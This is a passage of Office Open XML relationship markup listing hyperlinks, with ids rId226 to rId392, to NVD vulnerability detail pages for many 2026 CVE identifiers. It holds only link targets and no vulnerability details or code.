Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54510" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54524" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54608" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66571" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86049" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86862" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90887" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90986" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91014" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92925" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92959" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93014" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45720" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93015" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54633" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61793" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78223" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89038" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92915" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92936" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93395" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81447" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85717" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86788" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91011" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92756" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92757" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25261" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44235" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52852" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54648" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54676" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54677" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66572" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66573" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66574" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66576" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66577" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66578" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66579" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66617" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67071" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77281" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78294" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81453" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81868" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85078" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90923" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92912" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66608" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81443" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86311" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86522" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92880" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92993" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93394" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54521" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54644" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55946" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53556" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54582" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54585" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54586" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86861" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75523" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85718" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85720" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50022" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54575" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54576" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54587" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81479" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92933" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44940" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92758" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50291" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76781" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92926" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14311" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54613" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54643" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73999" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74005" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80355" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16582" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16750" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54355" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54594" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54604" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54642" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54907" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54918" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63461" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66575" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66676" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71568" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74000" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74002" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74017" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78296" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78528" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81829" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85999" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86000" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8674" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89064" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90922" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90982" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91015" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91016" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92879" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92920" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92927" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92963" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92973" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53555" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92932" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93295" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93296" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54546" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50603" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50604" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91019" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92921" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54645" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86824" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92611" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54565" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54495" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54551" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78427" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87829" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87831" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91009" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91010" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92839" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92881" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92893" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92894" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92904" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93013" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93307" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81441" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92949" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12284" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61700" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78426" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81438" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81439" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85716" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86446" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91008" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91017" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54471" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45723" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50607" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87836" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75588" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54579" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81637" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92945" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54649" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92962" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92992" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54577" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54578" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82723" TargetMode="External" Id="rId392" /><Relationship 